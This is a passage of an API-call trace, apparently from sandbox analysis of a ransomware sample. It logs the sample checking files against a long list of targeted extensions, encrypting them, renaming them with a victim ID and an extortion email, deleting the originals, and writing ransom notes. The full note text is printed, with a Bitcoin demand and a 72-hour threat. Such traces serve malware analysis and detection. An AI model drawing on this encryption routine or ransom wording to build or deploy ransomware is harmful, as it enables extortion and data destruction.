	[0200.656] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\", lpString2="CR_kBnC3kB_VYLQ.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\CR_kBnC3kB_VYLQ.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\CR_kBnC3kB_VYLQ.swf"
	[0200.657] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\CR_kBnC3kB_VYLQ.swf") returned 111
	[0200.657] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.657] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\CR_kBnC3kB_VYLQ.swf", cchLength=0x6f | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf") returned 0x6f
	[0200.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.657] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0200.852] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf"
	[0200.852] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf") returned 111
	[0200.853] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.853] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0200.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.854] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0200.854] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.854] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.854] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0200.858] ReadFile (in: hFile=0x32c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x18239, lpNumberOfBytesRead=0x188c20, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x188c20*=0x18239, lpOverlapped=0x0) returned 1
	[0200.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.864] CryptAcquireContextW (in: phProv=0x1887d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1887d0*=0xfcba18) returned 1
	[0200.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.866] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1887d4 | out: phHash=0x1887d4) returned 1
	[0200.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.867] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0200.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.867] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x1887d8 | out: phKey=0x1887d8*=0xfb8ef0) returned 1
	[0200.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.867] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1887ec*=0x18239, dwBufLen=0x18239 | out: pbData=0x0*, pdwDataLen=0x1887ec*=0x18240) returned 1
	[0200.870] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.870] RtlMoveMemory (in: Destination=0xff73d8, Source=0xfdf190, Length=0x18239 | out: Destination=0xff73d8) 
	[0200.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.871] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff73d8*, pdwDataLen=0x1887cc*=0x18239, dwBufLen=0x18240 | out: pbData=0xff73d8*, pdwDataLen=0x1887cc*=0x18240) returned 1
	[0200.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.871] CryptDestroyKey (hKey=0xfb8ef0) returned 1
	[0200.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.872] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0200.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.872] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0200.872] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.872] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1887e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1887e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.873] GetUserNameA (in: lpBuffer=0x1886cc, pcbBuffer=0x1887e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1887e4) returned 1
	[0200.874] wsprintfW (in: param_1=0x188800, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 153
	[0200.875] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0200.880] WriteFile (in: hFile=0x3ac, lpBuffer=0xff73d8*, nNumberOfBytesToWrite=0x18240, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0xff73d8*, lpNumberOfBytesWritten=0x188c28*=0x18240, lpOverlapped=0x0) returned 1
	[0200.888] CloseHandle (hObject=0x3ac) returned 1
	[0200.889] CloseHandle (hObject=0x32c) returned 1
	[0200.889] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf")) returned 1
	[0200.898] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\cr_kbnc3kb_vylq.swf")) returned 0
	[0200.899] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x103ef9c0, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x103ef9c0, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="wu9RMPx3T2rmzF3qVbg", cAlternateFileName="WU9RMP~1")) returned 1
	[0200.899] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x103ef9c0, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x103ef9c0, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="wu9RMPx3T2rmzF3qVbg", cAlternateFileName="WU9RMP~1")) returned 0
	[0200.899] FindClose (in: hFindFile=0xfb94b0 | out: hFindFile=0xfb94b0) returned 1
	[0200.902] FindClose (in: hFindFile=0xfb94b0 | out: hFindFile=0xfb94b0) returned 0
	[0200.902] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6"
	[0200.902] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*"
	[0200.902] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.903] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.903] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\HELP_DECRYPT_YOUR_FILES.TXT") returned 119
	[0200.903] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.904] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0200.904] WriteFile (in: hFile=0x390, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0200.907] CloseHandle (hObject=0x390) returned 1
	[0200.907] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.951] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.951] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0200.952] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0200.952] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.953] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0200.953] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0200.953] WriteFile (in: hFile=0x390, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0200.954] CloseHandle (hObject=0x390) returned 1
	[0200.954] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.954] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.955] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0200.955] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\HELP_DECRYPT_YOUR_FILES.HTML") returned 120
	[0200.955] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.957] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to 